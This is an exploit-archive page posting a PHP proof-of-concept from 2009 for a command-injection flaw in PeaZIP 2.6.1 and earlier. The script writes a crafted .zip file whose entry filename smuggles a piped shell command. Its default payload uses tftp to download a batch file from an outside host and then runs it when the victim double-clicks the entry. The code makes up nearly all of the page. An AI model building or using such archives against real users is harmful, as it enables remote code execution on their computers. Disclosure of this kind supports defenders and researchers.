exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PeaZIP 2.6.1 Command Injection

PeaZIP 2.6.1 Command Injection
Posted Jun 5, 2009
Authored by Nine:Situations:Group | Site retrogod.altervista.org

PeaZIP versions 2.6.1 and below compressed filename command injection proof of concept exploit.

tags | exploit, proof of concept
SHA-256 | 7a1031d528d4e736b853742268e21241be84465070b23c6c7e45071ee9944dcd

PeaZIP 2.6.1 Command Injection

Change Mirror Download
<?php
/*
PeaZIP <= 2.6.1 commpressed filename command injection poc exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
software site: http://peazip.sourceforge.net/

tested against: peazip 2.5.1, 2.6.1 for Windows

a pipe vulnerability exists in the way peazip handles file entries,
prepare the .zip file, open with it, then double click the compressed text file,
a cmd shell is launched ...
*/

#change, cannot use slashes or backslashes here
$cmd = "tftp 192.168.0.1 GET pyro pyro.bat & pyro.bat";

class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;

function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

if ($timearray['year'] < 0x7bc) {
$timearray['year'] = 0x7bc;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}

return (($timearray['year'] - 0x7bc) << 0x19) | ($timearray['mon'] << 0x15) | ($timearray['mday'] << 0x10) |
($timearray['hours'] << 0xb) | ($timearray['minutes'] << 0x5) | ($timearray['seconds'] >> 0x1);
}

function addFile($data, $name, $time = 0)
{
$time= (int) $time;
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');

$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00"; // ver needed to extract
$fr .= "\x00\x00"; // gen purpose bit flag
$fr .= "\x08\x00"; // compression method
$fr .= $hexdtime; // last mod time and date

// "local file header" segment
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug
$c_len = strlen($zdata);
$fr .= pack('V', $crc); // crc32
$fr .= pack('V', $c_len); // compressed filesize
$fr .= pack('V', $unc_len); // uncompressed filesize
$fr .= pack('v', strlen($name)); // length of filename
$fr .= pack('v', 0); // extra field length
$fr .= $name;

$fr .= $zdata;
$this -> datasec[] = $fr;

$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00"; // version made by
$cdrec .= "\x14\x00"; // version needed to extract
$cdrec .= "\x00\x00"; // gen purpose bit flag
$cdrec .= "\x08\x00"; // compression method
$cdrec .= $hexdtime; // last mod time & date
$cdrec .= pack('V', $crc); // crc32
$cdrec .= pack('V', $c_len); // compressed filesize
$cdrec .= pack('V', $unc_len); // uncompressed filesize
$cdrec .= pack('v', strlen($name)); // length of filename
$cdrec .= pack('v', 0); // extra field length
$cdrec .= pack('v', 0); // file comment length
$cdrec .= pack('v', 0); // disk number start
$cdrec .= pack('v', 0); // internal file attributes
$cdrec .= pack('V', 32); // external file attributes - 'archive' bit set

$cdrec .= pack('V', $this -> old_offset); // relative offset of local header
$this -> old_offset += strlen($fr);

$cdrec .= $name;

$this -> ctrl_dir[] = $cdrec;
}

function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);

return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) . // total # of entries "on this disk"
pack('v', sizeof($this -> ctrl_dir)) . // total # of entries overall
pack('V', strlen($ctrldir)) . // size of central dir
pack('V', strlen($data)) . // offset to start of central dir
"\x00\x00"; // .zip file comment length
}

}

$zipfile = new zipfile();
$zipfile -> addFile("lol","../../../../../../../\" README.TXT \" ".str_repeat("\x20",0xde - strlen($cmd))."\" | $cmd | .txt");
$dump_buffer = $zipfile -> file();
assert(file_put_contents("9sg.zip",$dump_buffer));
?>



Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close